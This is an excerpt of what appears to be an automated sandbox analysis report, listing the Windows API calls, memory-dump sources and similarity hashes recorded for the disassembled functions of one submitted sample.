                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065DC09
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065DC2F
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0065DC32
                                                                                                                • SysAllocString.OLEAUT32 ref: 0065DC53
                                                                                                                • SysFreeString.OLEAUT32 ref: 0065DC5C
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0065DC76
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0065DC84
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: f79e5d057db667872c541abe4bbbf691d7b1f4af1a33cc78bbc3203093274687
                                                                                                                • Instruction ID: 91bc2da8a7e78443e43f2bae51381dad4c2095f970d483fbfffb6afac3c60800
                                                                                                                • Opcode Fuzzy Hash: f79e5d057db667872c541abe4bbbf691d7b1f4af1a33cc78bbc3203093274687
                                                                                                                • Instruction Fuzzy Hash: 24218675604205BF9B20DFA8DC88DAB77EEEB08361B108165FD55CB2A1D670DC45CB64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                                                                                  • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                                                                                  • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00687632
                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0068763F
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0068764A
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00687659
                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00687665
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                • Opcode ID: a6846766e4eb68ca43efdd1b5f34f3794e7e609cc80117e882db681c0dfb7ddc
                                                                                                                • Instruction ID: 2f99609b99b00e69d4b44070dc940fa79cf5aae675ecf032294ca66cd15ef54d
                                                                                                                • Opcode Fuzzy Hash: a6846766e4eb68ca43efdd1b5f34f3794e7e609cc80117e882db681c0dfb7ddc
                                                                                                                • Instruction Fuzzy Hash: A411E6B1150119BFEF149F64CC85EE77F6EEF08398F114214B604A21A0D672DC61DBA4
                                                                                                                APIs
                                                                                                                • __init_pointers.LIBCMT ref: 00629AE6
                                                                                                                  • Part of subcall function 00623187: EncodePointer.KERNEL32(00000000), ref: 0062318A
                                                                                                                  • Part of subcall function 00623187: __initp_misc_winsig.LIBCMT ref: 006231A5
                                                                                                                  • Part of subcall function 00623187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00629EA0
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00629EB4
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00629EC7
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00629EDA
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00629EED
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00629F00
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00629F13
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00629F26
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00629F39
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00629F4C
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00629F5F
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00629F72
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00629F85
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00629F98
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00629FAB
                                                                                                                  • Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00629FBE
                                                                                                                • __mtinitlocks.LIBCMT ref: 00629AEB
                                                                                                                • __mtterm.LIBCMT ref: 00629AF4
                                                                                                                  • Part of subcall function 00629B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00629AF9,00627CD0,006BA0B8,00000014), ref: 00629C56
                                                                                                                  • Part of subcall function 00629B5C: _free.LIBCMT ref: 00629C5D
                                                                                                                  • Part of subcall function 00629B5C: DeleteCriticalSection.KERNEL32(02l,?,?,00629AF9,00627CD0,006BA0B8,00000014), ref: 00629C7F
                                                                                                                • __calloc_crt.LIBCMT ref: 00629B19
                                                                                                                • __initptd.LIBCMT ref: 00629B3B
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00629B42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3567560977-0
                                                                                                                • Opcode ID: ff591124b70d2c2354a3e609e1aa7a639b95dd45655f56c0668a91c4a1e122a2
                                                                                                                • Instruction ID: 777c0d87aac19726a818e8d8cf89e92cf2e483dd8b9d42be70cd6bbc11fe8990
                                                                                                                • Opcode Fuzzy Hash: ff591124b70d2c2354a3e609e1aa7a639b95dd45655f56c0668a91c4a1e122a2
                                                                                                                • Instruction Fuzzy Hash: 92F06D32619F316AE7A47774BC076CB2697AF82735F200A1DF464962D2EF2184414EB8
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0068B644
                                                                                                                • _memset.LIBCMT ref: 0068B653
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006C6F20,006C6F64), ref: 0068B682
                                                                                                                • CloseHandle.KERNEL32 ref: 0068B694
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                                • String ID: ol$dol
                                                                                                                • API String ID: 3277943733-828293295
                                                                                                                • Opcode ID: bf4013ac3694bfc7d405118e5b521f660b0559b1a7d48c051a6fc13a4af2f95e
                                                                                                                • Instruction ID: e439e9276288290c2479d3823c569f70d275d2d12143356cef7d896b9c624651
                                                                                                                • Opcode Fuzzy Hash: bf4013ac3694bfc7d405118e5b521f660b0559b1a7d48c051a6fc13a4af2f95e
                                                                                                                • Instruction Fuzzy Hash: AAF05EB25403107BE3102B61FC0AFBB7A9FEB08395F005428FA18E5192D7718C008BAC
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00623F85), ref: 00624085
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0062408C
                                                                                                                • EncodePointer.KERNEL32(00000000), ref: 00624097
                                                                                                                • DecodePointer.KERNEL32(00623F85), ref: 006240B2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                • API String ID: 3489934621-2819208100
                                                                                                                • Opcode ID: afa7440c550bc7478bc577312e1b0c43a493678df46dc668dfedd2f7969a5d06
                                                                                                                • Instruction ID: 4cf96a1feb7f7c0e9e36a89a4d12702b9ea65619efbcac4dbb5091186c7fa05c
                                                                                                                • Opcode Fuzzy Hash: afa7440c550bc7478bc577312e1b0c43a493678df46dc668dfedd2f7969a5d06
                                                                                                                • Instruction Fuzzy Hash: DAE0BF70541311FFDB109F61ED0DF953AA7BB04742F14A124F101E1AA0CF764644DF95
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253778849-0
                                                                                                                • Opcode ID: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                                                                • Instruction ID: e3418981cc8224443fb1ac2593d46603aa33dec00cea7860300a3ffb713eadda
                                                                                                                • Opcode Fuzzy Hash: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                                                                • Instruction Fuzzy Hash: AD618E7050065AABDF45EF60DC82AFF37A7AF05308F048919F8566B293DB34AD06CB65
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 00680E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0067FDAD,?,?), ref: 00680E31
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006802BD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006802FD
                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00680320
                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00680349
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0068038C
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00680399
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046560759-0
                                                                                                                • Opcode ID: 7eede53f37e62f95e80633160e29f59dcc70c723137abfeb6ae62966e6839320
                                                                                                                • Instruction ID: 8851b38ac22e0364064cfbd50bf6541974bdbadb167e5cb78aaf2363f0be64bd
                                                                                                                • Opcode Fuzzy Hash: 7eede53f37e62f95e80633160e29f59dcc70c723137abfeb6ae62966e6839320
                                                                                                                • Instruction Fuzzy Hash: 13516C31108201AFD754EF64C895EAFBBEAFF85314F044A1DF585872A2DB31E909CB56
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(?), ref: 006857FB
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00685832
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0068585A
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 006858C9
                                                                                                                • GetSubMenu.USER32(?,?), ref: 006858D7
                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00685928
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                • String ID:
                                                                                                                • API String ID: 650687236-0
                                                                                                                • Opcode ID: 137b7913b70e9c478ca4a2a0312b30ad884bfeeefe989cf08acfddf553848f4b
                                                                                                                • Instruction ID: d8095d2af43559dfb18614936b364935d3f2dcc07cda9eea2efa1f6aaa3c0636
                                                                                                                • Opcode Fuzzy Hash: 137b7913b70e9c478ca4a2a0312b30ad884bfeeefe989cf08acfddf553848f4b
                                                                                                                • Instruction Fuzzy Hash: BE519071E00625EFCF14EF64C8459AEB7B6EF48310F10456AE802BB351CB74AE41CB94
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0065EF06
                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 0065EF78
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0065EFD3
                                                                                                                • _memmove.LIBCMT ref: 0065EFFD
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0065F04A
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0065F078
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1101466143-0
                                                                                                                • Opcode ID: ff5474beaad40cfca1f952b0513dfe44891753caf815eacafb5bfd3086788318
                                                                                                                • Instruction ID: aa5f83a8b5fe28e8fc88897755331a62c0f273413538a22e04234776d0a875f2
                                                                                                                • Opcode Fuzzy Hash: ff5474beaad40cfca1f952b0513dfe44891753caf815eacafb5bfd3086788318
                                                                                                                • Instruction Fuzzy Hash: 5D5155B5A00209AFCB14CF58C894AAAB7F9FF4C310F15856AED49DB341E331E915CBA0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00662258
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006622A3
                                                                                                                • IsMenu.USER32(00000000), ref: 006622C3
                                                                                                                • CreatePopupMenu.USER32 ref: 006622F7
                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00662355
                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00662386
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3311875123-0
                                                                                                                • Opcode ID: f66ea1407e439be467b96a068f5cde078f9229ccaec8603921459b9ded2a8678
                                                                                                                • Instruction ID: 6d054406fd05b46858f004587ea2a6928fee6015244bcc4af9fa8bf372914e2a
                                                                                                                • Opcode Fuzzy Hash: f66ea1407e439be467b96a068f5cde078f9229ccaec8603921459b9ded2a8678
                                                                                                                • Instruction Fuzzy Hash: 9451BD70A00A4BEBDF21CF68D8A8BEDBBF6BF05314F104629E811A7390D7749945CB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0060179A
                                                                                                                • GetWindowRect.USER32(?,?), ref: 006017FE
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0060181B
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0060182C
                                                                                                                • EndPaint.USER32(?,?), ref: 00601876
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                • String ID:
                                                                                                                • API String ID: 1827037458-0
                                                                                                                • Opcode ID: 296e2543ba029fbaae6c07037a7b0176cef140b96a2a252fd957cb7bc36b0e32
                                                                                                                • Instruction ID: 8bdfba4a5036790914f9366ae38d9e515789c194dc518f339bf0fcd90b7a01d3
                                                                                                                • Opcode Fuzzy Hash: 296e2543ba029fbaae6c07037a7b0176cef140b96a2a252fd957cb7bc36b0e32
                                                                                                                • Instruction Fuzzy Hash: D8418C30504710AFD710DF24CC84FBB7BEAEB4A724F144629FAA58A2E1D731A985DB61
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(006C57B0,00000000,01425550,?,?,006C57B0,?,0068B5A8,?,?), ref: 0068B712
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0068B736
                                                                                                                • ShowWindow.USER32(006C57B0,00000000,01425550,?,?,006C57B0,?,0068B5A8,?,?), ref: 0068B796
                                                                                                                • ShowWindow.USER32(00000000,00000004,?,0068B5A8,?,?), ref: 0068B7A8
                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0068B7CC
                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0068B7EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: 77bb4a715b0ca8b315ae7a883a0b2f78e46918447bdee76da76db23c798009f0
                                                                                                                • Instruction ID: fed334d13a061fe458c602acf062ab93c91f581250e58c8ad1998304342ffe92
                                                                                                                • Opcode Fuzzy Hash: 77bb4a715b0ca8b315ae7a883a0b2f78e46918447bdee76da76db23c798009f0
                                                                                                                • Instruction Fuzzy Hash: 09417D34600240AFDB22EF24D499BD57BE2FF49310F5852B9E9488F7A2C731A856CB50
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00674E41,?,?,00000000,00000001), ref: 006770AC
                                                                                                                  • Part of subcall function 006739A0: GetWindowRect.USER32(?,?), ref: 006739B3
                                                                                                                • GetDesktopWindow.USER32 ref: 006770D6
                                                                                                                • GetWindowRect.USER32(00000000), ref: 006770DD
                                                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0067710F
                                                                                                                  • Part of subcall function 00665244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006652BC
                                                                                                                • GetCursorPos.USER32(?), ref: 0067713B
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00677199
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4137160315-0
                                                                                                                • Opcode ID: ae9123ba6f40875248ca21ad6915bec0069000b2570aeed9f2a226365469e19e
                                                                                                                • Instruction ID: 578509b7289df5794609410a9fbec880110da19dafe5f70b20f7882ad9c4ecbd
                                                                                                                • Opcode Fuzzy Hash: ae9123ba6f40875248ca21ad6915bec0069000b2570aeed9f2a226365469e19e
                                                                                                                • Instruction Fuzzy Hash: C731D272609305ABD720DF14D849B9BB7AAFF89314F040A19F58997291DB30EA09CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 006580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006580C0
                                                                                                                  • Part of subcall function 006580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006580CA
                                                                                                                  • Part of subcall function 006580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006580D9
                                                                                                                  • Part of subcall function 006580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006580E0
